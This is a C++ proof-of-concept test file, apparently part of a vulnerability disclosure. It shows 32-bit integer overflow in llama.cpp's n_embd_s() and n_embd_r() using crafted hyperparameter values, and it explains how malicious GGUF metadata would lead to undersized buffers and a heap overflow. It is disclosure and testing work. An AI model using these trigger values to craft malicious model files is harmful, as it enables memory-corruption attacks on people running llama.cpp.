File size: 7,016 Bytes

0513a39

/**
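 * Empirical proof: uint32_t integer overflow in llama_hparams::n_embd_s()
 * and llama_hparams::n_embd_r()
 *
 * Tests 1-4 directly instantiate llama_hparams from llama.cpp and call
 * n_embd_s() / n_embd_r() with overflow-inducing values, proving the overflow
 * occurs in the actual production code (not a simulation). Test 5 is a
 * simulation: it reproduces the allocation-site multiplication using plain
 * uint32_t values.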
 *
 * Build:
 *   cd llama.cpp
 *   g++ -std=c++17 -I src -I include -I ggml/include \
 *       ../gguf_poc/test_hparams_overflow.cpp src/llama-hparams.cpp \
 *       -o ../gguf_poc/test_hparams_overflow
 *
 * Run:
 *   ./test_hparams_overflow
 */

#include "llama-hparams.h"
#include <cstdio>
#include <cstdint>
#include <cstring>

/**
 * Print the "OVERFLOW" line for a 32-bit result and its 64-bit reference.
 *
 * Nothing is printed when the 32-bit value did not lose data, so the output
 * never claims an overflow that the Status line then reports as SAFE. The
 * shrink factor (correct / result) is only computed when result is non-zero,
 * which avoids a division by zero if the value wrapped to exactly 0.
 *
 * @param result  value returned by the 32-bit computation under test
 * @param correct the same product evaluated in 64-bit arithmetic
 */
static void poc_print_overflow(uint32_t result, uint64_t correct) {
    if (result >= correct) {
        return;  // no truncation: nothing to report
    }
    if (result == 0) {
        printf("  OVERFLOW: %llu -> 0 (wraps to ZERO, buffer would be empty!)\n",
               (unsigned long long)correct);
        return;
    }
    printf("  OVERFLOW: %llu -> %u (buffer is %llux too small!)\n",
           (unsigned long long)correct, result,
           (unsigned long long)(correct / result));
}

/**
 * Print the "Status" line and report whether the 32-bit result was truncated.
 *
 * @param result         value returned by the 32-bit computation under test
 * @param correct        the same product evaluated in 64-bit arithmetic
 * @param vulnerable_msg text printed when result is smaller than correct
 * @return true when result < correct (i.e. the check counts as vulnerable)
 */
static bool poc_print_status(uint32_t result, uint64_t correct, const char * vulnerable_msg) {
    const bool truncated = result < correct;
    printf("  Status: %s\n\n", truncated ? vulnerable_msg : "SAFE");
    return truncated;
}

/**
 * Entry point: runs five overflow checks and prints a per-test report.
 *
 * Tests 1-4 call llama_hparams::n_embd_s() / n_embd_r() on a zeroed
 * llama_hparams with selected fields set; Test 5 multiplies two plain
 * uint32_t values. Each check compares the 32-bit result with the same
 * expression evaluated in 64 bits. The final banner reflects how many
 * checks actually reported a truncated value.
 *
 * @return always 0; the outcome is conveyed through stdout only
 */
int main() {
    const int n_tests = 5;
    int n_vulnerable = 0;  // number of checks whose 32-bit result was truncated

    printf("================================================================\n");
    printf("EMPIRICAL PROOF: uint32_t overflow in llama_hparams::n_embd_s()\n");
    printf("================================================================\n\n");

    // --- Test 1: Mamba path (ssm_d_state * ssm_d_inner) ---
    {
        printf("--- Test 1: Mamba path (line 169: return ssm_d_state * ssm_d_inner) ---\n");

        // Zero every byte so no field keeps a non-zero default.
        // NOTE(review): memset assumes llama_hparams is trivially copyable - confirm.
        llama_hparams hp = {};
        memset(&hp, 0, sizeof(hp));
        hp.n_layer = 1;

        // Set values that overflow when multiplied as uint32_t
        hp.ssm_d_state = 1073741825;  // (2^30 + 1)
        hp.ssm_d_inner = 4;

        // Ensure we hit the Mamba path (wkv_head_size=0, n_embd_head_kda=0)
        hp.wkv_head_size = 0;
        hp.n_embd_head_kda = 0;

        uint32_t result = hp.n_embd_s();

        // Correct value in 64-bit: 1073741825 * 4 = 4,294,967,300
        // (a 32-bit product of the same operands wraps to 4)
        uint64_t correct = (uint64_t)hp.ssm_d_state * hp.ssm_d_inner;

        printf("  ssm_d_state      = %u\n", hp.ssm_d_state);
        printf("  ssm_d_inner      = %u\n", hp.ssm_d_inner);
        printf("  n_embd_s() returned: %u\n", result);
        printf("  Correct value:       %llu\n", (unsigned long long)correct);
        poc_print_overflow(result, correct);
        if (poc_print_status(result, correct, "VULNERABLE (overflow confirmed)")) {
            n_vulnerable++;
        }
    }

    // --- Test 2: RWKV path (n_embd * wkv_head_size) ---
    {
        printf("--- Test 2: RWKV6 path (line 158: return n_embd * wkv_head_size) ---\n");

        llama_hparams hp = {};
        memset(&hp, 0, sizeof(hp));
        hp.n_layer = 1;

        // 65537^2 = 2^32 + 131073, so a 32-bit product wraps to 131073
        hp.n_embd = 65537;
        hp.wkv_head_size = 65537;

        uint32_t result = hp.n_embd_s();
        uint64_t correct = (uint64_t)hp.n_embd * hp.wkv_head_size;

        printf("  n_embd           = %u\n", hp.n_embd);
        printf("  wkv_head_size    = %u\n", hp.wkv_head_size);
        printf("  n_embd_s() returned: %u\n", result);
        printf("  Correct value:       %llu\n", (unsigned long long)correct);
        poc_print_overflow(result, correct);
        if (poc_print_status(result, correct, "VULNERABLE (overflow confirmed)")) {
            n_vulnerable++;
        }
    }

    // --- Test 3: Kimi KDA path (n_embd_head_kda^2 * n_head) ---
    {
        printf("--- Test 3: Kimi KDA path (line 165: return n_embd_head_kda * n_embd_head_kda * n_head()) ---\n");

        llama_hparams hp = {};
        memset(&hp, 0, sizeof(hp));
        hp.n_layer = 1;
        hp.wkv_head_size = 0;

        hp.n_embd_head_kda = 65536;  // 65536^2 = 2^32, wraps to 0
        // n_head() reads n_head_arr[0], must be set
        hp.n_head_arr[0] = 1;

        uint32_t result = hp.n_embd_s();
        uint64_t correct = (uint64_t)hp.n_embd_head_kda * hp.n_embd_head_kda * hp.n_head_arr[0];

        printf("  n_embd_head_kda  = %u\n", hp.n_embd_head_kda);
        printf("  n_head           = %u\n", hp.n_head_arr[0]);
        printf("  n_embd_s() returned: %u\n", result);
        printf("  Correct value:       %llu\n", (unsigned long long)correct);
        if (result == 0) {
            printf("  OVERFLOW: wraps to ZERO! ggml_new_tensor_1d allocates 0 bytes!\n");
        } else {
            printf("  OVERFLOW: %llu -> %u\n", (unsigned long long)correct, result);
        }
        if (poc_print_status(result, correct, "VULNERABLE (overflow confirmed)")) {
            n_vulnerable++;
        }
    }

    // --- Test 4: n_embd_r() Mamba path ---
    {
        printf("--- Test 4: n_embd_r() Mamba path (line 152) ---\n");

        llama_hparams hp = {};
        memset(&hp, 0, sizeof(hp));
        hp.n_layer = 1;
        hp.wkv_head_size = 0;
        hp.n_shortconv_l_cache = 0;
        hp.n_embd_head_kda = 0;

        hp.ssm_d_conv = 4;
        hp.ssm_d_inner = 4;
        hp.ssm_n_group = 1;
        hp.ssm_d_state = 715827883;  // chosen so (d_conv-1)*(d_inner + 2*1*d_state) overflows

        uint32_t result = hp.n_embd_r();
        // (4-1) * (4 + 2*1*715827883) = 3 * (4 + 1431655766) = 3 * 1431655770 = 4294967310
        uint64_t sub = (uint64_t)hp.ssm_d_inner + 2ULL * hp.ssm_n_group * hp.ssm_d_state;
        uint64_t correct = ((uint64_t)hp.ssm_d_conv - 1) * sub;

        printf("  ssm_d_conv   = %u\n", hp.ssm_d_conv);
        printf("  ssm_d_inner  = %u\n", hp.ssm_d_inner);
        printf("  ssm_n_group  = %u\n", hp.ssm_n_group);
        printf("  ssm_d_state  = %u\n", hp.ssm_d_state);
        printf("  n_embd_r() returned: %u\n", result);
        printf("  Correct value:       %llu\n", (unsigned long long)correct);
        if (poc_print_status(result, correct, "VULNERABLE (overflow confirmed)")) {
            n_vulnerable++;
        }
    }

    // --- Test 5: Double overflow at allocation site ---
    {
        printf("--- Test 5: Double overflow simulation (allocation site lines 94-95) ---\n");
        printf("  Code: hparams.n_embd_s() * mem_size\n");
        printf("  Both are uint32_t, multiplication overflows before widening to int64_t\n\n");

        // This check does not call into llama.cpp; it only repeats the
        // multiplication with local values.
        uint32_t n_embd_s_val = 65536;  // legitimate n_embd_s() return value
        uint32_t mem_size = 65537;       // batch/sequence size

        uint32_t result = n_embd_s_val * mem_size;  // uint32_t * uint32_t
        uint64_t correct = (uint64_t)n_embd_s_val * mem_size;

        printf("  n_embd_s()   = %u\n", n_embd_s_val);
        printf("  mem_size     = %u\n", mem_size);
        printf("  uint32 mul   = %u\n", result);
        printf("  Correct mul  = %llu\n", (unsigned long long)correct);
        if (poc_print_status(result, correct, "VULNERABLE (double overflow)")) {
            n_vulnerable++;
        }
    }

    // Only claim that every path is vulnerable when every check said so.
    printf("================================================================\n");
    if (n_vulnerable == n_tests) {
        printf("CONCLUSION: All overflow paths in n_embd_s()/n_embd_r() are\n");
        printf("confirmed vulnerable. An attacker crafting GGUF metadata with\n");
        printf("these values causes undersized buffer allocation in\n");
        printf("llama_memory_recurrent (lines 94-95), leading to heap overflow\n");
        printf("when recurrent state data is written during inference.\n");
    } else {
        printf("CONCLUSION: %d of %d overflow checks reported VULNERABLE.\n",
               n_vulnerable, n_tests);
        printf("See the per-test Status lines above for the affected paths.\n");
    }
    printf("================================================================\n");

    return 0;
}